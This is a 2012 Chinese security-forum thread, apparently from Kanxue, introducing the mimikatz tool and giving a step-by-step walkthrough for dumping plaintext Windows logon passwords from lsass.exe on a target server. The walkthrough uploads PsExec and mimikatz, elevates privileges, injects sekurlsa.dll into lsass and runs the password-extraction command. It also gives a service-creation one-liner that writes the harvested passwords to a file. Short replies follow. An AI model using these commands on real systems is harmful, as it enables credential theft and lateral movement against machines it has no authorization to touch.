首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
可怕的神器:抓取windows明文密钥--mimikatz
发表于: 2012-4-11 09:19 12237

可怕的神器:抓取windows明文密钥--mimikatz

package 活跃值
2012-4-11 09:19
12237
先放软件地址:
e35K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3u0D9L8$3N6Q4x3X3g2Y4k6h3&6@1K9h3I4C8K9i4N6A6i4K6u0W2j5$3!0E0i4K6u0r3k6r3!0%4L8X3I4G2j5h3c8K6i4K6u0r3L8h3W2E0K9h3E0S2N6s2A6Q4y4h3k6@1M7Y4g2F1K9#2)9J5k6i4A6A6M7l9`.`.

这是一位法国人写的一个工具,非常强大,可以说有点颠覆的感觉。下面听我慢慢道来:
由于本人初到kanxue不知道怎么插入图片,测试图没法放上来,所以尽量文字了。
大家可以先看一篇博文,这是关于mimikatz直接从 lsass.exe 中获取当前用户明文密码的文章:
fa3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4m8W2L8Y4c8W2M7%4c8E0L8$3&6C8k6i4W2Q4x3X3g2F1k6i4c8Q4x3V1k6T1L8r3!0Y4i4K6u0r3L8h3W2E0K9h3E0S2N6s2A6Q4x3X3c8@1L8$3!0D9i4K6u0V1N6r3!0Q4x3X3c8J5k6h3y4G2N6X3g2J5i4K6u0V1j5$3I4W2j5i4u0@1k6i4S2@1i4K6u0V1M7r3q4K6M7%4N6G2M7X3c8K6i4K6u0V1k6Y4u0G2L8g2)9J5k6r3I4K6j5i4y4K6

大家都知道windows的密码是可逆的加密算法,hash算法是不可逆的,因此很多做渗透的人往往利用wce.exe 或 lslsass.exe这两个工具取得hash 值,利用彩虹表跑密码。这种方式比较暴力。而此工具在注入 lsass.exe 时。调用的 sekurlsa.dll 应该包含了对应的解密算法,因此才能抓到明文密码。懂逆向分析的朋友可以测试下,本人在这里就不过多赘述了。

这个工具可以提升进程权限,注入进程,读取进程内存,调试程序等等很多功能,大家有空可以试一试。

该工具对win 03 win08 vista win7均有效,xp(不稳定),2000 不行(至少目前测试结果来看)

测试环境:
windows server 2003 Enterprise Edition 5.2.3790 sp2

测试步骤:
1、要抓去密码,需要找到以下三个文件:
mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll 

2、上传至目标服务器,(路径不含中文,否则加载DLL的时候会报错),目录要有执行权限。
3、可以通过以下方法抓取:

//PsExec.exe 启动。
//在本机启动交互式命令提示窗口(远程执行)
psexec \\127.0.0.1 cmd.exe
//启动 mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
//提权
privilege::debug
//注入dll,注意使用绝对路径
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
//抓取密码
@getLogonPasswords
//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
exit

//*********************************************************

//使用 At 启动
at ***

//*********************************************************

//创建服务方法
sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
sc start getpassword
Ps:怎么插入本地图片告诉我一下,纠结ing……

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (10)
pxf
雪    币: 252
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
pxf
2
这个工具出来很久了
2012-4-11 09:56
0
xouou
雪    币: 90
活跃值: (91)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
支持一下,

楼主说什么神器不神器的,我是菜鸟我没看出来

不过在看雪发帖还是低调些的好,标题要低调!

Opera自动回帖补丁,插图补丁,字数补丁...
2012-4-11 11:02
0
zzcc
雪    币: 243
活跃值: (247)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
貌似有点强悍。。。
2012-4-11 11:21
0
少尉
雪    币: 2361
活跃值: (334)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
03SP2 提权失败.
2012-4-11 16:55
0
aslduke
雪    币: 33
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
发帖和做人一样
要低调
2012-5-9 13:33
0
cnyyk
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
thanks for sharing...

bro.
2012-5-21 10:50
0
rainboys
雪    币: 63
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
倒数第二步000000005错误是什么原因呢
2012-6-6 10:15
0
kxxylt
雪    币: 62
活跃值: (1180)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
黑客防线上09年就已经发展明文获取密码的文章了!
2012-6-6 11:07
0
陈旭A
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
10
支持一下,

楼主说什么神器不神器的,我是菜鸟我没看出来

不过在看雪发帖还是低调些的好,标题要低调!
2012-8-23 14:55
0
coverme
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
11
发帖和做人一样
要低调
2012-8-24 14:39
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回